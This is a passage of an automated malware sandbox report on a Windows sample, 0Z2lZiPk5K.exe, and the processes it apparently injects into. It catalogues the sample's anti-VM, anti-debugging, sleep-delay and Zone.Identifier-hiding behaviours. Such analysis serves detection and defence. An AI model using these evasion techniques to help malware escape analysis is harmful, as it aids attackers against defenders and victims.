Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_04622DD7 push ecx; ret	6_2_04622DF9
Source: C:\Program Files (x86)\UfZEyORKgSvTFqnSCOfxjOCsWvydrtatPFvwJqsPBXEIgypEOKDVHPizThvpVEQqUlZhXPisrTLKWU\ONQMbShhwr.exe	Code function: 6_2_04622F18 pushfd ; retf	6_2_04622F19

Source: 0Z2lZiPk5K.exe

Static PE information: section name: .text entropy: 6.826884286951344

Source: 0Z2lZiPk5K.exe, Xb.cs	High entropy of concatenated method names: 'k3', 't2', 'Mf', 'i6', 'g4', 'Pp', 'Hf', 'Cq', 'Yr', 'Kx'
Source: 0Z2lZiPk5K.exe, Yw82Sf.cs	High entropy of concatenated method names: 'Lm40Re', 'n5R3Ja', 's6LEx9', 'f0MEj2', 'Ni0z4W', 'o0FZk9', 'Sa4g3M', 'Af7e4Y', 'Nb45Di', 'Xf6a9L'
Source: 0Z2lZiPk5K.exe, Ac50Wx.cs	High entropy of concatenated method names: 'f5Y4Lc', 'b5K6Pd', 'Me4x8J', 'n9JMq1', 'z7B5Gg', 'c1Q0Fm', 'Hb78Pw', 'By0s2F', 'w9M4Kj', 'w3R1Ex'
Source: 0Z2lZiPk5K.exe, Zf40B.cs	High entropy of concatenated method names: 'Km2g3', 'MoveNext', 'Wi8e2', 'SetStateMachine', 'Bz6q3', 'Fx31J', 't6PAe', 'Fk64Z', 'Yf20K', 'n5T7C'
Source: 0Z2lZiPk5K.exe, t3XN.cs	High entropy of concatenated method names: 'g3Z9', 'Wc8e', 'd1M3', 'o3FC', 'b8H6M', 'f0G7Z', 'z6R2N', 'Wf8t7', 'Xt3c1', 'Yd59Z'

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

File opened: C:\Users\user\Desktop\0Z2lZiPk5K.exe\:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 0Z2lZiPk5K.exe PID: 6496, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\RmClient.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Tries to delay execution (extensive OutputDebugStringW loop)

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Section loaded: OutputDebugStringW count: 109

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: 2BF0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: 2D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: 4D60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: 8680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: 9680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: 9860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: A860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: AC20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: BC20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Memory allocated: CC20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 3_2_0199096E rdtsc

3_2_0199096E

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\RmClient.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe TID: 6712	Thread sleep time: -78000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe TID: 6544	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe TID: 3428	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe TID: 6640	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\RmClient.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\RmClient.exe

Code function: 7_2_0050C0D0 FindFirstFileW,FindNextFileW,FindClose,

7_2_0050C0D0

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: 0Z2lZiPk5K.exe, 00000000.00000002.2192147310.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: VBoxTray
Source: 0Z2lZiPk5K.exe, 00000000.00000002.2192147310.00000000055B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: 234343455GSOFTWARE\VMware, Inc.\VMware VGAuth
Source: RmClient.exe, 00000007.00000002.2926246142.000000000082D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: ONQMbShhwr.exe, 00000009.00000002.2926650705.0000000000DCF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}}
Source: firefox.exe, 0000000A.00000002.2923559698.00000192AF1CC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\\

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe

Code function: 0_2_02BFE188 CheckRemoteDebuggerPresent,

0_2_02BFE188

Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\0Z2lZiPk5K.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\RmClient.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 3_2_0199096E rdtsc

3_2_0199096E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

Code function: 3_2_00417263 LdrLoadDll,

3_2_00417263

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D019F mov eax, dword ptr fs:[00000030h]	3_2_019D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D019F mov eax, dword ptr fs:[00000030h]	3_2_019D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D019F mov eax, dword ptr fs:[00000030h]	3_2_019D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D019F mov eax, dword ptr fs:[00000030h]	3_2_019D019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194A197 mov eax, dword ptr fs:[00000030h]	3_2_0194A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194A197 mov eax, dword ptr fs:[00000030h]	3_2_0194A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194A197 mov eax, dword ptr fs:[00000030h]	3_2_0194A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01990185 mov eax, dword ptr fs:[00000030h]	3_2_01990185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F4180 mov eax, dword ptr fs:[00000030h]	3_2_019F4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F4180 mov eax, dword ptr fs:[00000030h]	3_2_019F4180
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0C188 mov eax, dword ptr fs:[00000030h]	3_2_01A0C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A0C188 mov eax, dword ptr fs:[00000030h]	3_2_01A0C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A261E5 mov eax, dword ptr fs:[00000030h]	3_2_01A261E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CE1D0 mov eax, dword ptr fs:[00000030h]	3_2_019CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CE1D0 mov eax, dword ptr fs:[00000030h]	3_2_019CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_019CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CE1D0 mov eax, dword ptr fs:[00000030h]	3_2_019CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019CE1D0 mov eax, dword ptr fs:[00000030h]	3_2_019CE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019801F8 mov eax, dword ptr fs:[00000030h]	3_2_019801F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A161C3 mov eax, dword ptr fs:[00000030h]	3_2_01A161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A161C3 mov eax, dword ptr fs:[00000030h]	3_2_01A161C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FA118 mov ecx, dword ptr fs:[00000030h]	3_2_019FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FA118 mov eax, dword ptr fs:[00000030h]	3_2_019FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FA118 mov eax, dword ptr fs:[00000030h]	3_2_019FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FA118 mov eax, dword ptr fs:[00000030h]	3_2_019FA118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov eax, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov ecx, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov eax, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov eax, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov ecx, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov eax, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov eax, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov ecx, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov eax, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE10E mov ecx, dword ptr fs:[00000030h]	3_2_019FE10E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A10115 mov eax, dword ptr fs:[00000030h]	3_2_01A10115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01980124 mov eax, dword ptr fs:[00000030h]	3_2_01980124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956154 mov eax, dword ptr fs:[00000030h]	3_2_01956154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01956154 mov eax, dword ptr fs:[00000030h]	3_2_01956154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194C156 mov eax, dword ptr fs:[00000030h]	3_2_0194C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E8158 mov eax, dword ptr fs:[00000030h]	3_2_019E8158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24164 mov eax, dword ptr fs:[00000030h]	3_2_01A24164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A24164 mov eax, dword ptr fs:[00000030h]	3_2_01A24164
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E4144 mov eax, dword ptr fs:[00000030h]	3_2_019E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E4144 mov eax, dword ptr fs:[00000030h]	3_2_019E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E4144 mov ecx, dword ptr fs:[00000030h]	3_2_019E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E4144 mov eax, dword ptr fs:[00000030h]	3_2_019E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E4144 mov eax, dword ptr fs:[00000030h]	3_2_019E4144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A160B8 mov eax, dword ptr fs:[00000030h]	3_2_01A160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01A160B8 mov ecx, dword ptr fs:[00000030h]	3_2_01A160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0195208A mov eax, dword ptr fs:[00000030h]	3_2_0195208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019480A0 mov eax, dword ptr fs:[00000030h]	3_2_019480A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E80A8 mov eax, dword ptr fs:[00000030h]	3_2_019E80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D20DE mov eax, dword ptr fs:[00000030h]	3_2_019D20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194C0F0 mov eax, dword ptr fs:[00000030h]	3_2_0194C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019920F0 mov ecx, dword ptr fs:[00000030h]	3_2_019920F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_0194A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019580E9 mov eax, dword ptr fs:[00000030h]	3_2_019580E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D60E0 mov eax, dword ptr fs:[00000030h]	3_2_019D60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E016 mov eax, dword ptr fs:[00000030h]	3_2_0196E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E016 mov eax, dword ptr fs:[00000030h]	3_2_0196E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E016 mov eax, dword ptr fs:[00000030h]	3_2_0196E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0196E016 mov eax, dword ptr fs:[00000030h]	3_2_0196E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D4000 mov ecx, dword ptr fs:[00000030h]	3_2_019D4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019F2000 mov eax, dword ptr fs:[00000030h]	3_2_019F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019E6030 mov eax, dword ptr fs:[00000030h]	3_2_019E6030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194A020 mov eax, dword ptr fs:[00000030h]	3_2_0194A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194C020 mov eax, dword ptr fs:[00000030h]	3_2_0194C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01952050 mov eax, dword ptr fs:[00000030h]	3_2_01952050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019D6050 mov eax, dword ptr fs:[00000030h]	3_2_019D6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197C073 mov eax, dword ptr fs:[00000030h]	3_2_0197C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01948397 mov eax, dword ptr fs:[00000030h]	3_2_01948397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01948397 mov eax, dword ptr fs:[00000030h]	3_2_01948397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_01948397 mov eax, dword ptr fs:[00000030h]	3_2_01948397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197438F mov eax, dword ptr fs:[00000030h]	3_2_0197438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0197438F mov eax, dword ptr fs:[00000030h]	3_2_0197438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194E388 mov eax, dword ptr fs:[00000030h]	3_2_0194E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194E388 mov eax, dword ptr fs:[00000030h]	3_2_0194E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_0194E388 mov eax, dword ptr fs:[00000030h]	3_2_0194E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE3DB mov eax, dword ptr fs:[00000030h]	3_2_019FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE3DB mov eax, dword ptr fs:[00000030h]	3_2_019FE3DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 3_2_019FE3DB mov ecx, dword ptr fs:[00000030h]	3_2_019FE3DB
